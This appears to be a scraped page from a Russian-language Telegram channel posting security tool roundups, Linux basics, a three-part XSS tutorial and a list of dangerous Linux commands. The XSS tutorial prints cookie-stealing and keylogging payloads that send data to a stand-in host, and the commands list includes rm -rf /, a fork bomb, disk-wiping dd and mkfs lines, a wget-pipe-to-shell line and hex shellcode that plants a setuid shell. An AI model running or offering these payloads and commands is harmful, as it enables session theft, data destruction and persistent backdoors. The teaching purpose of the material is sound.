Kali Linux
53.7K subscribers
1.05K photos
74 videos
13 files
1.09K links
@linux_kal наш чат

По всем вопросам- @workakkk

@ai_machinelearning_big_data - машинное обучение

@itchannels_telegram - 🔥 главные ресурсы для хакера

@programming_books_it - бесплатные it книги

@pythonl -🐍

РКН: clck.ru/3Fmszy
Download Telegram
SpiderFoot – инструмент OSINT что автоматизирует анализ угроз и отображение поверхности атаки

Интегрируется практически со всеми доступными источниками данных и использует ряд методов для анализа данных, что упрощает навигацию, имеет встроенный веб-сервер


⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍82
📃Основы повышения привилегий

Сегодня речь пойдет о повышении привилегий на Linux системах.

Чтобы сразу не углубляться в дебри, имеет смысл сказать, что есть администратор (root) и другие пользователи, имена у которых могут быть разные. Зависит от воображения.

Пользователи делятся на группы, котором администратор назначает доступ к различным файлам и командам. Нас интересует команда sudo.

Sudo (англ. Substitute User and do, дословно «подменить пользователя и выполнить») — программа для системного администрирования UNIX-систем, позволяющая делегировать те или иные привилегированные ресурсы пользователям с ведением протокола работы.

Например:
Sudo whoami. Данная команда запустит команду whoami от лица root пользователя, которую в свою очередь скажет нам, "под каким" пользователем мы находимся в системе.

Смысл заключается в том, что мы можем эксплуатировать не правильные системные настройки или же версию ядра для получения более высоких привилегий в системе. Об этом я расскажу чуть позже. Важно понять азы.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18👍61
🔥 Полезные библиотеки Python

Osintgram
- инструмент OSINT в Instagram для сбора, анализа и проведения разведки пользователя по нику. Предлагает широкий спектр методов.

⚙️ Инструкция по установке/использованию 👇

🖥 GitHub

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍161🔥1
5 визуально эффектных программ для командной строки

Многие из нас уже имели дело с командной строкой. Этот классический текстовый интерфейс позволяет выполнять все необходимые задачи, с которыми не справляется GUI. Иногда работа с терминалом требует максимального погружения.

Любой универсальный разработчик должен владеть основными навыками использования командной строки: освоить принцип работы, научиться редактировать файлы, настраивать приложения и т.д. При этом совсем необязательно работать с черно-белым скучным интерфейсом. Почему бы не воспользоваться интересными и визуально эффектными программами для командной строки, которые обновляют ее внешнюю эстетику?

В статье мы проведем обзор сторонних программ, которые улучшают внешний вид консоли. И пусть совершенные функциональные возможности и производительность не входят в число главных приоритетов таких программ, зато они взрывают унылый интерфейс буйством красок.

Читать

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍63
👺 TorghostNG — инструмент написанный на Python, который в пару команд позволяет пустит весь ваш трафик через сеть Tor.

Установка:
$ git clone https://github.com/githacktools/TorghostNG
$ cd TorghostNG
$ sudo python3 install.py

Использование:
$ sudo torghostng

⚙️ GitHub/Инструкция

#python #soft #github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍174🔥4
XSS уязвимости на примере

Сегодня я расскажу Вам про XSS на примере и постараюсь объяснить все тонкости, которые можно уместить в три поста. Итак начнем!

#Что такое XSS
XSS или же Cross-site scripting это атака которая позволяет Вам встроить java code в сайт а иногда даже в его базу данных, что может повлечь серьезные проблемы.

#Полезная нагрузка
Для внедрения XSS используются полезные нагрузки. Это готовые строчки кода, которые упрощают пентестеру жизнь. Давайте рассмотрим примеры полезных нагрузок.

1. Кража сеанса:
Детали сеанса пользователя, такие как токены входа, часто хранятся в файлах cookie на целевом компьютере. Приведенный ниже JavaScript принимает целевой файл cookie, base64 кодирует файл cookie для обеспечения успешной передачи и затем отправляет его на веб-сайт под контролем хакера для регистрации. Как только хакер получит эти файлы cookie, он сможет захватить сеанс цели и войти в систему как этот пользователь.

💣<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>


2. Key Logger:
Приведенный ниже код действует как регистратор ключей. Это означает, что все, что вы вводите на веб-странице, будет перенаправлено на веб-сайт, находящийся под контролем хакера. Это могло быть очень опасно, если бы полезная нагрузка веб-сайта была установлена на разрешенных логинах пользователей.

💣<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>

#Reflected XSS
Всего бывают три вида XSS. Это reflected dom и stored. Давайте кратко рассмотрим первый вид.
Reflected xss это вид межсайтового скриптинга, в котором внедренный скрипт выполняется на стороне пользователя или же клиента. То есть, вы можете вывести слово или цифру с помощью строчки кода и если вы скинете ссылку человеку и он перейдет по ней, у него будет та же надпись что и у Вас.

Злоумышленник может отправлять ссылки или встраивать их в iframe на другом веб-сайте, содержащем полезную нагрузку JavaScript, потенциальным жертвам, заставляя их выполнить код в своем браузере, потенциально раскрывая информацию о сеансе или о клиенте.

После того как уязвимость найдена Злоумышленник может подключить программное обеспечение, которое упростит ему работу с кодом, просто нажав пару раз мышкой по интерфейсу программы.

@linuxkalii
👍163🔥3
Nrich инструмент для сканирования портов и поиска уязвимостей.

Новый инструмент командной строки для быстрого анализа списка IP-адресов и просмотра открытых портов и уязвимостей.

Gitlab

@linuxkalii
🔥265👍4🥰1
⚡️ XSS уязвимости на примере Ч.2


Это вторая часть серии постов про XSS уязвимости на примере. Сегодня постараюсь рассмотреть и показать Вам принцип работы XSS "Хранимого" типа. Погнали.

#Хранимые XSS
Хранимые XSS это тип Кросс-сайт сриптинга где, полезная нагрузка которого обрабатывается на серверной стороне. А именно взаимодействует с базами данных.

#Принцип действия
Веб-сайт блог, который позволяет пользователям публиковать комментарии. К сожалению, эти комментарии не проверяются на предмет того, содержат ли они JavaScript или отфильтровывают какой-либо вредоносный код. И если мы сейчас опубликуем комментарий, содержащий JavaScript, он будет сохранен в базе данных, и у каждого другого пользователя, который сейчас посещает статью, будет запускаться JavaScript в своем браузере.

Таким образом, вредоносный код который мы встраиваем в Java Script, в качестве полезной нагрузки позволяет нам перенаправлять пользователей на другой сайт, который может быть нашим фишинговым сайтом, красть cookie файлы, и даже установить обратное подключение.

1 часть

@linuxkalii
🔥14👍71
👺 Hunter how - инструмент для исследователей безопасности (аналог Shodan, Censys, Netlas).

Поисковая система умеет искать по домену, заголовку страницы, протоколу, местоположению, сертификатам, http-заголовкам, ASN, названию продукта и др.


⚙️ Инструмент

#infosec #search

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2310🔥2
LogonTracer

Софт связывает имя хоста (или IP-адрес) и имя учетной записи, обнаруженные в событиях, связанных со входом в систему, и отображает их в виде графа.

#Пентес

🖥 GitHub

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1210🔥1
Octosuite

Octosuite - продвинутый и полезный OSINT инструмент для сбора информации о пользователях, репозиториях и организациях GitHub с открытым исходным кодом.

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍197🔥2
🔐 Hashcat

Hashcat известен в сообществе экспертов по безопасности как самая быстрая и продвинутая утилита для взлома паролей и восстановления.

Этот проект с открытым исходным кодом, механизмом обработки правил в ядре, более 300 типов хешей и встроенной системой бенчмаркинга.

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2510🔥3🤔1
📡 Athena OS

Athena OS - дистрибутив Linux для cпецов по информационной безопасности, охотников за ошибками, пантестеров и хакеров. Отличный инструмент для пентестинга.

#Linux #Pentest #Arch

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3015🔥2
🔏 Контрольный список безопасности API

Чеклист наиболее важных контрмер по безопасности при разработке, тестировании и выпуске вашего API.

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍198🔥2
🚀 Шпаргалка Kali Linux

SQLMap Examples
Metasploit
Exploit Research
Password Cracking
Username Enumeration
HTTP / HTTPS Webserver Enumeration
DNSRecon
NMAP Commands и д.р

#linux #pentest #github

@linuxkalii
👍387🔥3👎2😱1
🖥 Список опасных команд Linux.

Командная строка Linux — очень продуктивная, полезная и интересная, но иногда она может быть очень опасной, особенно когда вы не уверены, что вы делаете. Для некоторых команд в командной строке вы должны перепроверить синтаксис дважды, прежде чем нажмёте Enter.

Команда rm -rf
Команда rm -rf — это один из самых быстрых способов удалить каталог и его содержимое. Но небольшая опечатка или незнание могут привести к непоправимому разрушению системы. Некоторые опции, используемые с командой rm.

rm в Linux используется для удаления файлов.
Команда rm -r удаляет каталог рекурсивно, даже если он непустой.
Команда rm -f удаляет файлы без запроса файлы ‘Только для чтения’.
rm -rf / : Принудительное удаление всего в корневой директории.
rm -rf * : Принудительное удаление всего в текущей/рабочей директории.
rm -rf . : Принудительное удаление всего в текущей директории и поддиректориях.

Следовательно, нужно быть осторожным, когда вы выполняете команду rm -rf. Чтобы обойти несчастные случаи с удалением файлов командой ‘rm‘, сделайте псевдоним (алиас) команды с параметром rm -i в файле “.bashrc”, после этого всегда будет появляться запрос при любому удалении.

Команда :(){ :|:& };:
В действительности эта команда является логической бомбой. Она оперирует определением функции с именем ‘:‘, которая вызывает сама себя дважды: один раз на переднем плане и один раз в фоне. Она продолжает своё выполнение снова и снова, пока система не зависнет.


:(){ :|:& };:
Команда > /dev/sda

Вышеприведённый пример пишет вывод «команды» в блок /dev/sda. Вышеприведённая команда пишет сырые данные и все файлы в блоке будут заменены сырыми данными, это станет причиной полной потери данных блока.

mv folder /dev/null
Команда mv переместит ‘folder‘ в /dev/null. В Linux /dev/null или null устройство — это специальный файл, который сбрасывает все данные, записанные в него, и сообщает, что операция записи прошла успешно.

# mv /home/user/* /dev/null
Вышеприведённая команда переместит всё содержимое пользовательских директорий user в /dev/null, что фактически является переносом всех данных в чёрную дыру (null).

wget https://malicious_source -O- | sh
Этот пример wget загрузит скрипт из вредоносного источника и выполнитего

mkfs.ext3 /dev/sda
Этот пример отформатирует ‘sda’. После выполнения данной команды ваш жёсткий диск будет помечен как «Новый». Вы останетесь без каких либо данных и с системой не подлежащей восстановлению.

> file
Эта команда используется для стирания текущего файла. Если эта команда будет выполнена с опечаткой или незнанием вроде “> xt.conf”, то это сотрёт конфигурационный или любой другой файл.

Это распространённая ошибка начинающих пользователей командной строки, когда они путают символы | (труба) и > (перенаправление вывода).

Например, вот так правильно:

echo 456 | grep -E '[0-9]'
А вот так вы затрёте бинарный файл:


echo 456 > grep -E '[0-9]'
^foo^bar

Эта команда используется для редактирования предыдущей запущенной команды без необходимости снова заново печатать всю команду. Это может быть действительно опасно.

dd if=/dev/random of=/dev/sda
Эта dd сотрёт блок устройства sda и заполнит его рандомным мусором. Система будет неработоспособной.

Скрытая команда
Команда ниже — это ничего более как rm -rf. Эта команда спрятана в шестнадцатеричную запись и пользователь может быть одурачен и запустить её. Запуск этого кода сотрёт ваш корневой раздел. Эта команда показывает здесь, что опасность может быть спрятана и иногда её трудно выявить.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;


@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4712🔥7
🏷ASNMAP

Полезная библиотека на Go для сбора сетевых диапазонов по ASN организации.

🖥 GitHub

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍227🔥2
​​💣XSS уязвимости на примере Ч. 3

В этом посте я постараюсь объяснить что такое XSS на основе dom.

Что такое DOM?

DOM расшифровывается как D ocument O bject M odel и представляет собой программный интерфейс для документов HTML и XML. Он представляет собой страницу, так что программы могут изменять структуру, стиль и содержимое документа. Веб-страница - это документ, и этот документ может отображаться в окне браузера или в качестве источника HTML.

Использование DOM
XSS на основе DOM - это место, где выполнение JavaScript происходит непосредственно в браузере без загрузки каких-либо новых страниц или передачи данных в серверный код. Выполнение происходит, когда код JavaScript веб-сайта воздействует на ввод или взаимодействие с пользователем.

Пример сценария:
JavaScript веб-сайта получает содержимое из window.location.hash параметра и затем записывает его на страницу в просматриваемом в данный момент разделе. Содержимое хэша не проверяется на наличие вредоносного кода, что позволяет злоумышленнику внедрить JavaScript по своему выбору на веб-страницу.


Возможное воздействие:
созданные ссылки могут быть отправлены потенциальным жертвам, перенаправляя их на другой веб-сайт или украдя контент со страницы или сеанса пользователя.

Как протестировать XSS на основе Dom:
XSS на основе DOM может быть сложной задачей для тестирования и требует определенных знаний JavaScript для чтения исходного кода. Вам нужно будет искать части кода, которые обращаются к определенным переменным, над которыми злоумышленник может иметь контроль, например, к параметрам « window.location.x ».

▪️1 часть
▪️2 часть

@linuxkalii
👍237🔥6
↗️ Ниже приведены некоторые из наиболее часто используемых команд Kali Linux:

1. "ls" - Перечислить файлы и каталоги в каталоге
2. "cd" - Изменить текущий рабочий каталог
3. "pwd" - Вывести текущий рабочий каталог.
4. "sudo" - Выполнить команду с привилегиями администратора
5. "apt-get update" - Обновить индекс пакетов
6. "apt-get upgrade" - Обновить установленные пакеты
7. "ifconfig" - Показать информацию о сетевых интерфейсах
8. "iwconfig" - Показать информацию о беспроводных сетевых интерфейсах
9. "ping" - Отправить пакеты на сетевой узел и измерить время отклика.
10. "nmap" - Сканировать сеть на наличие открытых портов и служб.
11. "msfconsole" - Запуск консоли Metasploit Framework
12. "airmon-ng" - Запуск и остановка мониторинга беспроводных сетевых интерфейсов
13. "aireplay-ng" - Воспроизведение трафика беспроводной сети.
14. "iptables" - Настройка брандмауэра ядра Linux для фильтрации

Superuser (cуперпользователь)

"Superuser" - это учетная запись привилегированного пользователя в операционных системах на базе Unix, таких как Kali Linux, которая имеет неограниченный доступ ко всем файлам, каталогам и системным ресурсам. Учетная запись суперпользователя обычно называется "root" и имеет идентификатор пользователя 0.

Superuser имеет возможность выполнять любые действия в системе, включая изменение системных файлов, установку программного обеспечения и изменение конфигурации системы.

Это делает учетную запись суперпользователя мощным инструментом, но также и потенциальным риском безопасности. Поэтому обычно рекомендуется избегать регулярного входа в учетную запись суперпользователя и использовать ее только в случае необходимости. Вместо этого для повседневной работы следует использовать учетную запись обычного пользователя с ограниченными привилегиями.

Мы будем использовать эти команды в следующих постах, чтобы использовать Kali Linux на полную мощность.

#Junior

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3211🔥3
📂 Специализированная файловая система proc

Файловая система proc является важным источником информации о вашей Linux-системе, который ни в коем случае нельзя игнорировать.

Proc является псевдо- или виртуальной файловой системой, которая предоставляет пользователям доступ к внутренним структурам ядра Linux.

Иначе говоря, proc не является реальной файловой системой в обычном смысле; она располагается исключительно в оперативной памяти. При этом она автоматически монтируется системой.

Ниже приведены важные файлы, относящиеся к процессам

Вы можете использовать следующие файлы файловой системы proc для получения информации об отдельных процессах:

/proc/$pid/cmdline — содержит параметры командной строки, переданные на этапе запуска процесса
/proc/$pid/cwd — является символьной ссылкой на текущую рабочую директорию процесса
/proc/$pid/environ — содержит переменные окружения, заданные на этапе запуска процесса
/proc/$pid/exe — является символьной ссылкой на исполненный бинарный файл
/proc/$pid/fd — поддиректория с символьными ссылками на файлы, открытые процессом
/proc/$pid/io — содержит статистику операций ввода/вывода процесса
/proc/$pid/limits — содержит информацию о лимитах использования ресурсов процессом
/proc/$pid/maps — содержит информацию об отображенных регионах памяти и правах доступа к ним
/proc/$pid/stack — содержит трассировку вызовов функций в рамках стека ядра
/proc/$pid/stat — содержит статистику использования ресурсов процессом
/proc/$pid/task/ — является директорией с информацией о программных потоках

Важные файлы, относящиеся к системе
А это список важных файлов, не относящихся к отдельным процессам:

/proc/cmdline — содержит аргументы, переданные ядру Linux
/proc/cpuinfo — содержит информацию о центральном процессоре
/proc/meminfo — содержит информацию об оперативной памяти
/proc/filesystems — содержит информацию о поддерживаемых ядром файловых системах
/proc/modules — содержит информацию о загруженных модулях ядра
/proc/partitions — содержит информацию дисковых разделах
/proc/swaps — содержит информацию о пространстве подкачки
/proc/self — содержит информацию о процессе, работающем с файловой системой proc
/proc/slabinfo — содержит информацию о кэшах ядра Linux
/proc/sys — содержит различные файлы и поддиректории, отражающие значения внутренних переменных ядра Linux

Где найти дополнительную информацию?
Данный пост содержит описание лишь некоторых элементов файловой системы proc. Дополнительная информация доступна на странице руководства proc, доступ к которой может быть послучен после исполнения команды man proc или после перехода по следующей ссылке.

#Junior

@linuxkalii
18👍12🔥2👎1😢1
Этичный хакинг с Kali Linux. Часть 2. Фазы атаки

Данная статья не будет содержать никаких практических примеров, и ее прочтение не займет у тебя много времени. Однако, без нее двигаться дальше будет так же бессмысленно, как и смотреть фильм в котором пропущен очень важный эпизод, несущий в себе смысл понимания происходящего во всей картине.

Тут мы затронем такую важную тему, как фазы атаки. Разберем стратегию действий атакующего шаг за шагом, для того, чтобы лучше понимать как проводить тестирования на проникновение эффективно и максимально приближенно к действиям злоумышленника.

Типы кибератак.

Условно все кибератаки можно разделить на два типа:

Массовые хакерские атаки — это создание ботнетов, распространение вредоносного ПО, почтовый спам и т. д. Чаще всего подобные атаки организуются любителями-энтузиастами, либо начинающими скрипт-кидди злоумышленниками.

Целевые атаки — любая атака на конкретную инфраструктуру (это те самые атаки, за которыми в статьях на «Хакере» стоят три магические буквы APT).

За подобного рода атаками обычно стоит группа опытных кибепреступников, которые используют и применяют самый полный спектр различных методик, приемов и инструментов для обхода всех стандартных средств защиты и получения доступа к целевым ресурсам.

Вполне логично предположить, что все подобные атаки должны иметь четкий план (сценарий атаки), представляющий из себя описание последовательности основных действий для достижения цели (фазы атаки).

Количество фаз может разниться, в зависимости от сценариев используемых атакующей стороной, но есть 4 основных фазы, которые присутствуют практически во всех видах атак:

1) футпринтинг (footprinting) или разведка - первоначальный сбор всей возможной информации о цели, как из открытых источников в сети Интернет, так и при помощи методов социальной инженерии и специальных инструментов (различных сканеров);

2) получение доступа к ресурсу (имея точные данные о том какие сервисы либо сетевые устройства используются в организации, можно попытаться найти уязвимости в этих системах. Яркий пример — APT атаки на правительственные сети в США в 2020 году, когда хакеры, стоявшие за этими атаками эксплуатировали уязвимости в VPN-серверах Fortinet и уязвимость Netlogon в Windows Server);

3) сохранение доступа (после получения доступа к целевой системе, злоумышленнику необходимо закрепиться в ней, на случай, если уязвимость которой он воспользовался будет закрыта. Для этого он может затроянить систему, чтобы сохранить к ней доступ);

4) сокрытие следов (любая современная система имеет на борту электронный журнал логирования всех выполняемых на ней действий. Отсюда следует, что в нем может сохраниться IP адрес с которого злоумышленник сканировал ресурсы сети или еще какая информация, которая может его разоблачить или дать понять техническому персоналу атакуемой компании, что их взломали).

Рассмотрим каждую фазу подробнее.

Футпринтинг (footprinting) или разведка — самая первая фаза планирования и подготовки к атаке, где главной задачей злоумышленника является сбор как можно большего количества информации о цели. Здесь можно выделить активный и пассивный подходы.

Пассивным подходом можно назвать обычное исследование цели путем сбора информации из открытых источников в Интернете либо методом социальной инженерии (познакомиться с сотрудником компании и попытаться выудить из него какую-то информацию).

К активному подходу можно отнести сканирование злоумышленником цели при помощи набора специальных инструментов (сетевые сканеры портов, сканеры уязвимостей системы);

Получение доступа к ресурсу. Тут может быть несколько вариантов.

Самый популярный — эксплуатация известной уязвимости в ПО сетевого оборудования либо операционной системы (подробнее эту тему мы рассмотрим позже). Так же, кроме получения доступа тут может быть сценарий дефейса (вывода из строя) ресурса атаками типа DoS/DDoS (доведение сервиса до отказа) при котором злоумышленнику совсем не обязательно получать доступ к системе;

@linuxkalii
👍2110🔥3👎1